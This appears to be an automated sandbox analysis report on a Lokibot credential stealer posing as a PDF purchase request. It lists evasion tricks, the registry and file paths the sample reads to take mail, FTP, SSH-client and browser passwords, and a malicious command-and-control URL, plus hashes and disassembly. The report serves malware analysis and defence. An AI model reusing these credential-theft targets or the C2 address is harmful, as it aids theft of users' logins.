          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54388031494.0000000010059000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032D6F6D rdtsc
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032EF95D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032D58A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032DA6F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032EDAC1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032D9D4A LdrLoadDll,
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess created: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information

          barindex
          Yara detected Lokibot
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
          Tries to harvest and steal ftp login credentials
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

          Remote Access Functionality

          barindex
          Yara detected Lokibot
          Source: Yara matchFile source: dump.pcap, type: PCAP

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Native API          		1
          Windows Service          		1
          Access Token Manipulation          		1
          Masquerading          		2
          OS Credential Dumping          		121
          Security Software Discovery          		Remote Services1
          Email Collection          		Exfiltration Over Other Network Medium11
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default AccountsScheduled Task/Job1
          DLL Side-Loading          		1
          Windows Service          		11
          Virtualization/Sandbox Evasion          		1
          Credentials in Registry          		11
          Virtualization/Sandbox Evasion          		Remote Desktop Protocol1
          Archive Collected Data          		Exfiltration Over Bluetooth1
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)11
          Process Injection          		1
          Access Token Manipulation          		Security Account Manager1
          Process Discovery          		SMB/Windows Admin Shares2
          Data from Local System          		Automated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)1
          DLL Side-Loading          		11
          Process Injection          		NTDS2
          File and Directory Discovery          		Distributed Component Object Model1
          Clipboard Data          		Scheduled Transfer14
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Obfuscated Files or Information          		LSA Secrets6
          System Information Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          DLL Side-Loading          		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe18%ReversingLabs
          REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane\AsOpenFile.exe0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll2%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
          https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external0%Avira URL Cloudsafe
          http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
          http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%Avira URL Cloudsafe
          https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
          http://157.245.36.27/~dokterpol/?page=2874100%Avira URL Cloudmalware
          http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
          http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%VirustotalBrowse
          http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%VirustotalBrowse
          https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external0%VirustotalBrowse

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          drive.google.com
          		142.250.185.238
          		truefalse
            		high
            googlehosted.l.googleusercontent.com
            		142.250.185.161
            		truefalse
              		high
              doc-0g-8k-docs.googleusercontent.com
              		unknown
              		unknownfalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://doc-0g-8k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/65eu063p0f9eoc2qkjfmonuuk5gkqmq4/1669764675000/03238822727237126472/*/1ZppbncXCwboWfcBo0A5zlqzevMjFwzpW?e=download&uuid=c4bc146b-22c6-4e17-89b8-c96a6eb96fabfalse
                  		high
                  http://157.245.36.27/~dokterpol/?page=2874true
                  • Avira URL Cloud: malware
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://doc-0g-8k-docs.googleusercontent.com/%%doc-0g-8k-docs.googleusercontent.comREQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391896205.0000000001901000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdREQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54203683114.00000000005F2000.00000008.00000001.01000000.00000006.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://drive.google.com/REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391638858.00000000018E5000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204236542.0000000000649000.00000008.00000001.01000000.00000006.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/externalREQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54356841847.0000000001984000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392074084.0000000001919000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204236542.0000000000649000.00000008.00000001.01000000.00000006.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdREQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54203683114.00000000005F2000.00000008.00000001.01000000.00000006.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://doc-0g-8k-docs.googleusercontent.com/)REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391896205.0000000001901000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://nsis.sf.net/NSIS_ErrorErrorREQUEST FOR OFFER 30-12-2022#U00b7pdf.exefalse
                          		high
                          http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDREQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204053166.0000000000626000.00000008.00000001.01000000.00000006.sdmpfalse
                            		high
                            http://www.gopher.ftp://ftp.REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204236542.0000000000649000.00000008.00000001.01000000.00000006.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://doc-0g-8k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/65eu063pREQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54362021539.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54356420593.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392699460.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392074084.0000000001919000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://doc-0g-8k-docs.googleusercontent.com/REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000003.54362021539.0000000001943000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391896205.0000000001901000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392699460.0000000001943000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                142.250.185.161
                                		googlehosted.l.googleusercontent.comUnited States
                                		15169GOOGLEUSfalse
                                157.245.36.27
                                		unknownUnited States
                                		14061DIGITALOCEAN-ASNUStrue
                                142.250.185.238
                                		drive.google.comUnited States
                                		15169GOOGLEUSfalse

                                General Information

                                Joe Sandbox Version:36.0.0 Rainbow Opal
                                Analysis ID:756301
                                Start date and time:2022-11-30 00:29:09 +01:00
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 7m 30s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                Run name:Suspected Instruction Hammering
                                Number of analysed new started processes analysed:11
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@4/6@2/3
                                EGA Information:
                                • Successful, ratio: 100%
                                HDC Information:
                                • Successful, ratio: 30.1% (good quality ratio 29.4%)
                                • Quality average: 88.5%
                                • Quality standard deviation: 21.7%
                                HCA Information:
                                • Successful, ratio: 96%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                • Stop behavior analysis, all processes terminated

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe
                                • TCP Packets have been reduced to 100
                                • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, login.live.com, ctldl.windowsupdate.com, wdcp.microsoft.com
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.

                                Simulations

                                Behavior and APIs

                                No simulations

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASNs

                                No context

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane\AsOpenFile.exe

                                Download File
                                Process:C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                Category:dropped
                                Size (bytes):38632
                                Entropy (8bit):5.840976252158136
                                Encrypted:false
                                SSDEEP:768:tba0g4rhVUkxIIaPrd6cMCP1diTLmz1BeeKH2X98VwhH:HPUkxIIaPrsCPXK6z1Bee3+k
                                MD5:ED609F8F09DE8AAA4F8CFF0285E0420A
                                SHA1:A7ADE9EB5BD4BAEFAB796C1D6EA92417F1396135
                                SHA-256:2488796ACE769813C729198CFD9E3C9D0A512168301D387BE569F2557C683821
                                SHA-512:32F080433C121FE1970BBB82911024A389E43B8B6BA059931FF0F3AFA4096BE79660C6DC9C1E027C21692D320F95896B0211C9FA0997AEC30F7A373382443FF2
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:low
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........!..r..r..r..4r..r..s..r..s..r..s..r..s..r..r..r..s..rp.s..rp.Xr..r.0r..rp.s..rRich..r........................PE..d......a..........#..........^.................@....................................Vo.... ..................................................N..........h....p..L....x...............B..p...................@D..(...@C...............0...............................text............................... ..`.rdata..*....0...0..."..............@..@.data........`.......R..............@....pdata..L....p.......T..............@..@.rsrc...h........ ...X..............@..@................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane\Tusindtallig.Syn

                                Download File
                                Process:C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):29309
                                Entropy (8bit):7.9930541941014255
                                Encrypted:true
                                SSDEEP:768:E49NB/CsjPddY0nfj1fIXSgH0uO7wt1WayrQ0bThetG:nlCsxfVIXHH2wOfKG
                                MD5:849FDC040AA117FC8B8AC03C745C690D
                                SHA1:831EE9C0B27F05069A323940A7C581CA21C9BE68
                                SHA-256:3C6382D1FD4C832B2BBD7CDD2508DDAA80BF40D17732C8B17C31D70CED631A79
                                SHA-512:A5F45B85DAD9FD26B7B111F402467D33B92E01F9C13CD4C2932FA53617746C246393BFEF020DAEE78F4C4515BABA2B50461DA761607CD97A200B3E2206BB08A6
                                Malicious:false
                                Reputation:low
                                Preview:...'.A&:}.....Y8.)..rRqi....t.b.&..K1....vy}5j.........=.f.(.....3C....p+,+.`Y[]..'u.1.].].0..?KP..F.v\..M...(.V.M..^D".3.r..t....9\.N...R..6..K..S.....o|.^Z b....C.G$.s(k^...m...r.L70.m.2q'.7.%*t..5u..d.#..T.,....%..5O?..".G._.(._V.......7e.``..r....~u.A..-o.7.{.....9.T<.+.H...u.}P..:...........p..t...^...D......#..0....j.?D.rG..".....C.....QP.......+.A..=...|.X..J.w(..V.....>{8.... .7.2m...>..;=.-....Qq...cx.=.....3..m.x.#..../............3.w.@Rd.rVt..Q.v..1LW`]'..Bs.{...........5....J...t..o..1..M.........H,(ugAw.....C.]...J.y...<~(u.....|..Y....B...}....(cn.....Gc..|.6x6w.....HD....GV........r....u\......^Po.._|]R.......R...|. LH....Z/}(st..0..F..L...J.G 5|.0t.q.x..m..W..X.k..=..k.+.a..U...r..f..|<O...t.vN.)..>t..J.j....J.'..OR.-.S..cU....?X............L!......3....l...a..A.[c.,....2....p.~..!%..m.2.....[=.......r.n.6......G...1...IqV..fn..j...E..[........>.CZHT.......w..~7<=.......<8e..I.p..Q...f.....qD..]Xh..LA...J........7.....O..

                                C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane\prowl.Dgn

                                Download File
                                Process:C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):141909
                                Entropy (8bit):7.124693631306355
                                Encrypted:false
                                SSDEEP:3072:COxlLD2mpgf8pOxNjQzNUflgAG63+OAyam6kxnv:COxlmcg5EzuNG6MyaJSv
                                MD5:0A951AA33DE8994CBE161F0E07F169B8
                                SHA1:38033C58EEFF600D22A068F1A7F599646BDFDD1E
                                SHA-256:4A98204499C5BA9F9518D6A7EF078A5A5F0B82173919E9A5D41179172BD28F60
                                SHA-512:F9BE445FDBD89EB0F5CACBB325D89E89755906F1DADE3A7E32593E4ADFCBFF2C8927350226BB8FD0238B4F8F72377F757ADCDAFE20C7FA2FF41C4A14814D8A27
                                Malicious:false
                                Reputation:low
                                Preview:.T.....i.. ..YA..^..;;..3Gn._+.P.a1TG...$;....r..K...8.W..gS..9j.t...j y._........e.....[z......Ae.8/.............................................................f........B..)...................................................................o..-...............................................7.Qf......B..e.................................................................f....L..2B........................................................................!..a....-.F..ooooooooooooooooooooooooooooooooooooooooo..c.B......JV.XS.......................................................................B.....f.r...=..U............................................................f....'.5~.......................................9x...f....:.e............................................................67..N..................................................!.f...f....9$}17................................................................2/..LPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPf......

                                C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll

                                Download File
                                Process:C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:modified
                                Size (bytes):11776
                                Entropy (8bit):5.656065698421856
                                Encrypted:false
                                SSDEEP:192:eY24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol+Sl:E8QIl975eXqlWBrz7YLOl+
                                MD5:17ED1C86BD67E78ADE4712BE48A7D2BD
                                SHA1:1CC9FE86D6D6030B4DAE45ECDDCE5907991C01A0
                                SHA-256:BD046E6497B304E4EA4AB102CAB2B1F94CE09BDE0EEBBA4C59942A732679E4EB
                                SHA-512:0CBED521E7D6D1F85977B3F7D3CA7AC34E1B5495B69FD8C7BFA1A846BAF53B0ECD06FE1AD02A3599082FFACAF8C71A3BB4E32DEC05F8E24859D736B828092CD5
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 2%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....MX...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Roaming\5D4ACB\B73EF6.lck

                                Download File
                                Process:C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Preview:1

                                C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3425316567-2969588382-3778222414-1001\1b1d0082738e9f9011266f86ab9723d2_11389406-0377-47ed-98c7-d564e683c6eb

                                Download File
                                Process:C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):47
                                Entropy (8bit):1.1262763721961973
                                Encrypted:false
                                SSDEEP:3:/lSllIEXln:AWE1
                                MD5:D69FB7CE74DAC48982B69816C3772E4E
                                SHA1:B1C04CDB2567DC2B50D903B0E1D0D3211191E065
                                SHA-256:8CC6CA5CA4D0FA03842A60D90A6141F0B8D64969E830FC899DBA60ACB4905396
                                SHA-512:7E4EC58DA8335E43A4542E0F6E05FA2D15393E83634BE973AA3E758A870577BA0BA136F6E831907C4B30D587B8E6EEAFA2A4B8142F49714101BA50ECC294DDB0
                                Malicious:false
                                Preview:........................................user.

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                Entropy (8bit):7.875386203366202
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
                                File size:194987
                                MD5:b9f70f4146b846179fa182ac868d0c15
                                SHA1:97cb5de0e0cc2f53cd73552f9d5b4381ab5a5907
                                SHA256:ff235029990af0449ce8f82c5546dfe37170d5e27ce1a22b0a43965a980344be
                                SHA512:2cc45205394074ddf9a5481a81b89582d84d42a34023329e06cf589c455c2fef144905362b5d1001e26026480d490304b6ac96526ab32f5344b1706d98ceff48
                                SSDEEP:3072:MRD+3q3NxPTNuY/bQZFler2MUPaSa1y8XKdV06k55ohchNqV3AzlbEnJZGqItyWJ:mwq3NpNSFleCMUPVaidHXMNqwlInJ0q8
                                TLSH:A714125533E0C523CAF202702DBB652F9EE9A642E262FF131360AF9D7D56307864C356
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L...8.MX.................b...*......J4............@

                                File Icon

                                Icon Hash:b2a88c96b2ca6a72

                                Static PE Info

                                General

                                Entrypoint:0x40344a
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0x584DCA38 [Sun Dec 11 21:50:48 2016 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:4ea4df5d94204fc550be1874e1b77ea7

                                Entrypoint Preview

                                Instruction
                                sub esp, 000002D4h
                                push ebx
                                push esi
                                push edi
                                push 00000020h
                                pop edi
                                xor ebx, ebx
                                push 00008001h
                                mov dword ptr [esp+14h], ebx
                                mov dword ptr [esp+10h], 0040A230h
                                mov dword ptr [esp+1Ch], ebx
                                call dword ptr [004080B4h]
                                call dword ptr [004080B0h]
                                cmp ax, 00000006h
                                je 00007FED94512513h
                                push ebx
                                call 00007FED9451566Ch
                                cmp eax, ebx
                                je 00007FED94512509h
                                push 00000C00h
                                call eax
                                mov esi, 004082B8h
                                push esi
                                call 00007FED945155E6h
                                push esi
                                call dword ptr [0040815Ch]
                                lea esi, dword ptr [esi+eax+01h]
                                cmp byte ptr [esi], 00000000h
                                jne 00007FED945124ECh
                                push ebp
                                push 00000009h
                                call 00007FED9451563Eh
                                push 00000007h
                                call 00007FED94515637h
                                mov dword ptr [0042A244h], eax
                                call dword ptr [0040803Ch]
                                push ebx
                                call dword ptr [004082A4h]
                                mov dword ptr [0042A2F8h], eax
                                push ebx
                                lea eax, dword ptr [esp+34h]
                                push 000002B4h
                                push eax
                                push ebx
                                push 004216E8h
                                call dword ptr [00408188h]
                                push 0040A384h
                                push 00429240h
                                call 00007FED94515220h
                                call dword ptr [004080ACh]
                                mov ebp, 00435000h
                                push eax
                                push ebp
                                call 00007FED9451520Eh
                                push ebx
                                call dword ptr [00408174h]
                                add word ptr [eax], 0000h

                                Rich Headers

                                Programming Language:
                                • [EXP] VC++ 6.0 SP5 build 8804

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000xb48.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
